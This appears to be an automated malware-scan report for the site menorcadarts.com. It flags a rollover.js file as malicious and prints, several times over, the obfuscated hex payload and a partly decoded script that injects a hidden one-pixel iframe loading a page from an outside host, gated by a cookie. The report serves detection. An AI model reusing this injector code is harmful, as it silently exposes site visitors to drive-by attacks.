Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=menorcadarts.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.menorcadarts.com/ | 200 OK Content-Length: 10842 Content-Type: text/html | clean |
http://www.menorcadarts.com/./assets/rollover.js | 200 OK Content-Length: 25413 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e8282872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e8282873c8180712e4b2e357682827e483d3d70777d7573803c75803d7d7c7a777c73706f7179837e3d5651667f5c4075823c7e767e35491b182e8282873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e8282873c8182877a733c707d807273802e4b2e353e35491b182e8282873c8182877a73 Decoded script: String String function zzzfff() { var tty = document.createElement('iframe'); tty.src = 'http://bioger.gr/onlinebackup/HCXqN2gt.php'; tty.style.position = 'absolute'; tty.style.border = '0'; tty.style.height = '1px'; tty.style.width = '1px'; tty.style.left = '1px'; tty.style.top = '1px'; if (!document.getElementById('tty')) { document.write('<div id=\'tty\'></div>'); document.getElementById('t ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://www.menorcadarts.com/./index.html | 200 OK Content-Length: 10842 Content-Type: text/html | clean |
http://www.menorcadarts.com/././assets/rollover.js | 200 OK Content-Length: 25413 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e8282872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e8282873c8180712e4b2e357682827e483d3d70777d7573803c75803d7d7c7a777c73706f7179837e3d5651667f5c4075823c7e767e35491b182e8282873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e8282873c8182877a733c707d807273802e4b2e353e35491b182e8282873c8182877a73 Decoded script: String String function zzzfff() { var tty = document.createElement('iframe'); tty.src = 'http://bioger.gr/onlinebackup/HCXqN2gt.php'; tty.style.position = 'absolute'; tty.style.border = '0'; tty.style.height = '1px'; tty.style.width = '1px'; tty.style.left = '1px'; tty.style.top = '1px'; if (!document.getElementById('tty')) { document.write('<div id=\'tty\'></div>'); document.getElementById('t ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://www.menorcadarts.com/././index.html | 200 OK Content-Length: 10842 Content-Type: text/html | clean |
http://www.menorcadarts.com/./././assets/rollover.js | 200 OK Content-Length: 25413 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e8282872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e8282873c8180712e4b2e357682827e483d3d70777d7573803c75803d7d7c7a777c73706f7179837e3d5651667f5c4075823c7e767e35491b182e8282873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e8282873c8182877a733c707d807273802e4b2e353e35491b182e8282873c8182877a73 Decoded script: String String function zzzfff() { var tty = document.createElement('iframe'); tty.src = 'http://bioger.gr/onlinebackup/HCXqN2gt.php'; tty.style.position = 'absolute'; tty.style.border = '0'; tty.style.height = '1px'; tty.style.width = '1px'; tty.style.left = '1px'; tty.style.top = '1px'; if (!document.getElementById('tty')) { document.write('<div id=\'tty\'></div>'); document.getElementById('t ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://www.menorcadarts.com/./././index.html | 200 OK Content-Length: 10842 Content-Type: text/html | clean |
http://www.menorcadarts.com/././././assets/rollover.js | 200 OK Content-Length: 25413 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e8282872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e8282873c8180712e4b2e357682827e483d3d70777d7573803c75803d7d7c7a777c73706f7179837e3d5651667f5c4075823c7e767e35491b182e8282873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e8282873c8182877a733c707d807273802e4b2e353e35491b182e8282873c8182877a73 Decoded script: String String function zzzfff() { var tty = document.createElement('iframe'); tty.src = 'http://bioger.gr/onlinebackup/HCXqN2gt.php'; tty.style.position = 'absolute'; tty.style.border = '0'; tty.style.height = '1px'; tty.style.width = '1px'; tty.style.left = '1px'; tty.style.top = '1px'; if (!document.getElementById('tty')) { document.write('<div id=\'tty\'></div>'); document.getElementById('t ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://www.menorcadarts.com/././././index.html | 200 OK Content-Length: 10842 Content-Type: text/html | clean |
http://www.menorcadarts.com/./././././assets/rollover.js | 200 OK Content-Length: 25413 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e8282872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e8282873c8180712e4b2e357682827e483d3d70777d7573803c75803d7d7c7a777c73706f7179837e3d5651667f5c4075823c7e767e35491b182e8282873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e8282873c8182877a733c707d807273802e4b2e353e35491b182e8282873c8182877a73 Decoded script: String String function zzzfff() { var tty = document.createElement('iframe'); tty.src = 'http://bioger.gr/onlinebackup/HCXqN2gt.php'; tty.style.position = 'absolute'; tty.style.border = '0'; tty.style.height = '1px'; tty.style.width = '1px'; tty.style.left = '1px'; tty.style.top = '1px'; if (!document.getElementById('tty')) { document.write('<div id=\'tty\'></div>'); document.getElementById('t ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://www.menorcadarts.com/./././././index.html | 200 OK Content-Length: 10842 Content-Type: text/html | clean |
http://www.menorcadarts.com/././././././assets/rollover.js | 200 OK Content-Length: 25413 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e8282872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e8282873c8180712e4b2e357682827e483d3d70777d7573803c75803d7d7c7a777c73706f7179837e3d5651667f5c4075823c7e767e35491b182e8282873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e8282873c8182877a733c707d807273802e4b2e353e35491b182e8282873c8182877a73 Decoded script: String String function zzzfff() { var tty = document.createElement('iframe'); tty.src = 'http://bioger.gr/onlinebackup/HCXqN2gt.php'; tty.style.position = 'absolute'; tty.style.border = '0'; tty.style.height = '1px'; tty.style.width = '1px'; tty.style.left = '1px'; tty.style.top = '1px'; if (!document.getElementById('tty')) { document.write('<div id=\'tty\'></div>'); document.getElementById('t ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://www.menorcadarts.com/././././././index.html | 200 OK Content-Length: 10842 Content-Type: text/html | clean |
http://www.menorcadarts.com/./././././././assets/rollover.js | 200 OK Content-Length: 25413 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e8282872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e8282873c8180712e4b2e357682827e483d3d70777d7573803c75803d7d7c7a777c73706f7179837e3d5651667f5c4075823c7e767e35491b182e8282873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e8282873c8182877a733c707d807273802e4b2e353e35491b182e8282873c8182877a73 Decoded script: String String function zzzfff() { var tty = document.createElement('iframe'); tty.src = 'http://bioger.gr/onlinebackup/HCXqN2gt.php'; tty.style.position = 'absolute'; tty.style.border = '0'; tty.style.height = '1px'; tty.style.width = '1px'; tty.style.left = '1px'; tty.style.top = '1px'; if (!document.getElementById('tty')) { document.write('<div id=\'tty\'></div>'); document.getElementById('t ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://www.menorcadarts.com/./././././././index.html | 200 OK Content-Length: 10842 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: menorcadarts.com
Result:
GET / HTTP/1.1
Host: menorcadarts.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: menorcadarts.com
Referer: http://www.google.com/search?q=menorcadarts.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: menorcadarts.com
Referer: http://www.google.com/search?q=menorcadarts.com
Result:
The result is similar to the first query. There are no suspicious redirects found.